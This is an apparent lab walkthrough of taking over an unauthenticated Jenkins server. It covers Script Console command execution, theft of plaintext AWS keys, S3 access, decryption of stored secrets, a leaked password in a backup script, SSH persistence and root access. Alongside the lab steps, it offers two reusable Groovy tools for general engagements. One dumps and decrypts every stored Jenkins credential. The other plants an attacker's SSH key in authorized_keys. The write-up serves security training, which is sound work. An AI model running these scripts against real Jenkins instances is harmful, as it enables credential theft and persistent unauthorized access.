Target

image-20251008164253140

nmap

```console
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p- -T4 10.1.20.120
Nmap scan report for 10.1.20.120
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1776.62 seconds
```

Port 8080 is running Jenkins.

image-20251008164655006

Jenkins has no authentication enabled: the dashboard is reachable anonymously.

Whenever I see this, I figure I can pretty much do whatever I want on that Jenkins server.

That is because in Dashboard/Manage Jenkins/Script Console you can write your own Groovy, which runs on the controller with the privileges of the Jenkins process, so it amounts to remote command execution.

For example:

```groovy
// Run a shell command on the controller and echo its stdout/stderr back into the console page
def proc = "ls -la /".execute()
proc.in.eachLine { println it }
proc.err.eachLine { System.err.println it }
proc.waitFor()
```

image-20251008165600648

The Jenkins notification centre shows a warning

image-20251008165804980

that AWS secrets are configured in plaintext.

Go to Dashboard/Manage Jenkins/System

and the configuration, including those keys, is visible there.

image-20251008170038080

After putting the access key and secret key into an AWS CLI profile, list the bucket contents:

```console
yliken@LAPTOP-40PQI58C:~$ aws s3 ls s3://jenkins-config-load --recursive --profile jenkins
2023-07-10 23:15:33          0 admin/
2024-02-10 05:13:57        115 admin/jenkins-backup.sh
2023-07-10 20:19:31       1111 config.xml
yliken@LAPTOP-40PQI58C:~$
```

But admin/jenkins-backup.sh cannot be read with this key: listing the bucket works, yet the object itself is denied (the CLI's HeadObject call fails with 403), so this key is only good for enumeration:

```console
yliken@LAPTOP-40PQI58C:~$ aws s3 cp s3://jenkins-config-load/admin/jenkins-backup.sh . --profile jenkins
fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
yliken@LAPTOP-40PQI58C:~$
```

Under Dashboard/Manage Jenkins/Credentials/System/Global credentials (unrestricted) there is a set of AWS credentials belonging to admin.

image-20251008170517936

Press F12 and edit the DOM: the Secret Access Key input is a password field that holds the encrypted value, so changing its type to text reveals the encoded Secret Access Key.

image-20251008170553296

It can be decrypted in the Script Console with println(hudson.util.Secret.decrypt("{<encrypted value>}")). Secret.decrypt() returns a hudson.util.Secret; .getPlainText() gives the cleartext explicitly, and println falls back to toString(), which returns it as well.

image-20251008171007745
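Rather than decrypting one field at a time through the browser, the same console can dump every stored credential at once. The following Groovy is an added example written for this page, not code from the original write-up or from the lab; it assumes the Credentials plugin is present (it ships with every stock Jenkins) and that the console runs as an administrator, which is the case when security is disabled as here. It walks each credential's bean properties and decrypts any hudson.util.Secret it finds, so it covers username/password, secret text, SSH private key and AWS credential types without naming plugin classes that may not be installed.

```groovy
// Added example (not from the original write-up): enumerate and decrypt every credential
// visible at the global scope from the Jenkins Script Console.
import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.common.StandardCredentials
import hudson.util.Secret
import jenkins.model.Jenkins

// Decrypt one value copied out of credentials.xml or out of a password field in the UI,
// e.g. "{AQAAABAAAAAw...}". Secret.decrypt() returns null if the string is not a Jenkins blob.
String decryptOne(String encrypted) {
    Secret s = Secret.decrypt(encrypted)
    return s == null ? null : s.plainText
}

// null authentication -> searched as SYSTEM; null domain requirements -> no domain filter.
def creds = CredentialsProvider.lookupCredentials(StandardCredentials.class, Jenkins.instance, null, null)
println "Found ${creds.size()} credential(s)"

creds.each { c ->
    println "== ${c.class.simpleName}  id=${c.id}  description=${c.description ?: ''}"
    // Inspect the bean generically: every getter is tried, failures are skipped so one odd
    // plugin type cannot abort the whole dump.
    c.metaClass.properties.each { mp ->
        def value
        try { value = mp.getProperty(c) } catch (Throwable ignored) { return }
        if (value instanceof Secret) {
            println "   ${mp.name}: ${value.plainText}"          // encrypted at rest, decrypted here
        } else if (mp.name in ['username', 'accessKey', 'privateKey', 'privateKeys']) {
            println "   ${mp.name}: ${value}"                    // stored in the clear already
        }
    }
}

// Usage of the single-value helper with a blob pasted from the page source:
// println decryptOne('{<encrypted value>}')
```

Everything printed here goes to the controller's log as well as the console page, so on a real engagement expect this to be visible to a defender who is watching Jenkins logs or the script console audit trail.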

After configuring a second profile with admin's credentials, admin/jenkins-backup.sh can be downloaded.

It is a short shell script:

```console
yliken@LAPTOP-40PQI58C:~$ aws s3 cp s3://jenkins-config-load/admin/jenkins-backup.sh . --profile jenkins2
download: s3://jenkins-config-load/admin/jenkins-backup.sh to ./jenkins-backup.sh
yliken@LAPTOP-40PQI58C:~$ cat jenkins-backup.sh
#!/bin/bash

sshpass -p 'VHwecyhrecc3' -P passphrase scp -i dev.pem -r dev@52.203.31.30:/backups/jenkins /backups/
yliken@LAPTOP-40PQI58C:~$
```

Then go back to the Script Console

and write an SSH public key into the jenkins user's ~/.ssh/authorized_keys.

image-20251008171307100

image-20251008172020006
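The screenshots above show that step being done by hand. The following Groovy is an added example written for this page, not code from the original write-up; it does the same thing from the Script Console while handling the two things that usually make this fail in practice: sshd rejects authorized_keys when ~/.ssh or the file is group/world writable (StrictModes is on by default), and a service account with a nologin shell cannot be logged into even with a valid key. The public key string is a placeholder; substitute the public half of a key pair you generated.

```groovy
// Added example (not from the original write-up): persist SSH access for the account the
// Jenkins controller runs as, with permissions sshd will accept.
import java.nio.file.Files
import java.nio.file.Path
import java.nio.file.Paths
import java.nio.file.StandardOpenOption
import java.nio.file.attribute.PosixFilePermissions

// Placeholder (assumption): replace with your own public key.
String pubKey = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIREPLACE_WITH_YOUR_PUBLIC_KEY kali'

// Jenkins runs as whichever user started the JVM; sshd looks for keys under that user's home.
String user = System.getProperty('user.name')
Path home   = Paths.get(System.getProperty('user.home'))
Path sshDir = home.resolve('.ssh')
Path auth   = sshDir.resolve('authorized_keys')

// Check the account is actually loginable before bothering: a nologin/false shell means
// the key will be accepted but the session closed immediately.
String passwdLine = new File('/etc/passwd').readLines().find { it.startsWith(user + ':') }
println "passwd entry: ${passwdLine}"
if (passwdLine && passwdLine.tokenize(':').last() =~ /nologin|false$/) {
    println "WARNING: ${user} has a non-interactive shell; SSH key login will not give a shell"
}

// StrictModes: ~/.ssh must be 0700 and authorized_keys 0600, both owned by the user.
if (!Files.isDirectory(sshDir)) Files.createDirectory(sshDir)
Files.setPosixFilePermissions(sshDir, PosixFilePermissions.fromString('rwx------'))

// Append only if the key is not already present, so re-running is harmless.
boolean present = Files.exists(auth) && Files.readAllLines(auth).any { it.trim() == pubKey.trim() }
if (!present) {
    Files.write(auth, [pubKey], StandardOpenOption.CREATE, StandardOpenOption.APPEND)
}
Files.setPosixFilePermissions(auth, PosixFilePermissions.fromString('rw-------'))

println "user=${user} home=${home}"
println "authorized_keys now holds ${Files.readAllLines(auth).size()} key(s)"
println "login with: ssh -i <private key> ${user}@<controller ip>"
```

On this box the account is jenkins and the controller is 10.1.20.120, which is exactly what the next step logs into.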

Then log in over SSH as the jenkins user,

and the password found in jenkins-backup.sh (passed to sshpass as the key passphrase there) is also root's password, so su gets root:

```console
┌──(kali㉿kali)-[~/Desktop/pwnedlabs]
└─$ ssh jenkins@10.1.20.120
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1028-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Oct  8 09:21:04 UTC 2025

  System load:  0.0               Processes:             97
  Usage of /:   47.5% of 7.57GB   Users logged in:       0
  Memory usage: 66%               IPv4 address for eth0: 10.1.20.120
  Swap usage:   0%

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   https://ubuntu.com/aws/pro

Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

jenkins@ip-10-1-20-120:~$ su -
Password:
root@ip-10-1-20-120:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-1-20-120:~# ls
flag.txt  snap
root@ip-10-1-20-120:~#
```